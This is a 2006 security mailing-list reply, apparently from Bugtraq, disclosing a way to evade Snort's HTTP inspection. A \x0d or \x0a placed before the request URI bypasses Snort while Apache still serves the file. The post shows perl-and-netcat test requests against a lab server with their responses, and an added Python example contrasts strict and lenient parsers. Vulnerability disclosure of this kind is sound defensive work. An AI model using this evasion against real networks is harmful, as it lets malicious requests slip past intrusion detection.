Message-ID: <20060603104124.1b1507a04a440dbbe6ab6eabc5c58a9e.fbc12fe6cd.wbe@email.secureserver.net>
Date: Sat, 03 Jun 2006 10:41:24 -0700
From: Sigint Consulting <info@...int-consulting.com>
To: bugtraq@...urityfocus.com, dailydave@...ts.immunitysec.com
Cc: security@...rt.org, dodge@....net, jebrahimi@...arc.net
Subject: Re: New Snort Bypass - Patch - Bypass of Patch


>I performed this research while developing NFR's web signatures, and found
>that all web servers I tested (several years ago) handled end-of-lines using
>"\x0d\x0a" and "\x0a" interchangeably. If you find a web server that
>interprets "index.php" in the example above as an actual filename, I for one
>would be very interested in knowing about it.
>
>Dodge
>

Apache 1.3.34 (debian package) returns index.html from my request as
normal even though the file name has a \x0d before it. So in Apache's
case it appears that the \x0d character will not mess up the request to
the webserver, at least in this case, AND still bypasses the snort check.
Now obviously the \x90\x90 are going to ruin the request because no
such file exists by that name, so they were left out of this example,
but this may mean the \x0d character would not mangle a real malicious
request to apache.

$ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Mon, 05 Jun 2006 07:25:47 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT
ETag: "6f9d3-4d-4481554a"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/html; charset=iso-8859-1

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. . 
$

Further research on the snort vulnerability reveals that the \x0a
character will also evade the snort preprocessor AND apache will return
a valid response. (Testing \x0a before a malicious unicode string did
not generate a snort alert)

$ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. .
$

Chris

--------------------------------
www.sigint-consulting.com
info@...int-consulting.com

Charlotte, North Carolina 
Information Security Consulting
--------------------------------
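The two request shapes tested in the post above, as an added example that is not part of the original message and not Snort's or Apache's code: a strict request-line parser beside one that mirrors the lenient end-of-line handling the post reports for Apache 1.3.34, showing why a URI-based rule sees nothing under the first and matches under the second. The regular expressions and the sample requests are constructed assumptions, not verified against either project's source.

```python
# Added example, not code from the original post, Snort or Apache: a strict
# request-line parser next to a lenient one that treats CR/LF between the
# request-line tokens as whitespace, the way the post observes Apache 1.3.34
# behaving.  An inspector that parses more strictly than the server it
# protects extracts no URI and so has nothing to run its URI rules against.
import re
from typing import Optional, Tuple

# Constructed sample requests: a plain one and the two shapes from the post.
SAMPLES = {
    "plain": b"GET /index.html HTTP/1.0\r\n\r\n",
    "cr":    b"GET \x0d/index.html HTTP/1.0\r\n\r\n",
    "lf":    b"GET \x0a/index.html HTTP/1.0\r\n\r\n",
}

# Strict: method, exactly one SP, URI, one SP, version.  A CR or LF right
# after the method makes the line unparseable.
STRICT = re.compile(rb"^([A-Z]+) (/[^ \t\r\n]*) HTTP/1\.[01]")

# Lenient (assumed server behaviour): any run of SP/HT/CR/LF separates
# the three request-line tokens.
LENIENT = re.compile(rb"^([A-Z]+)[ \t\r\n]+(/[^ \t\r\n]*)[ \t\r\n]+HTTP/1\.[01]")


def strict_uri(request: bytes) -> Optional[bytes]:
    """URI as a strict parser extracts it, or None if the line is malformed."""
    m = STRICT.match(request)
    return m.group(2) if m else None


def lenient_uri(request: bytes) -> Optional[bytes]:
    """URI as a server tolerant of CR/LF between tokens would resolve it."""
    m = LENIENT.match(request)
    return m.group(2) if m else None


def uri_rule_hits(request: bytes, needle: bytes) -> Tuple[bool, bool]:
    """(strict_hit, lenient_hit) for a rule that looks for `needle` in the
    extracted URI.  (False, True) is the gap the post describes: the server
    resolves the path but the strict inspector never saw a URI to check."""
    s, l = strict_uri(request), lenient_uri(request)
    return (s is not None and needle in s, l is not None and needle in l)


if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, strict_uri(req), lenient_uri(req),
              uri_rule_hits(req, b"index.html"))
```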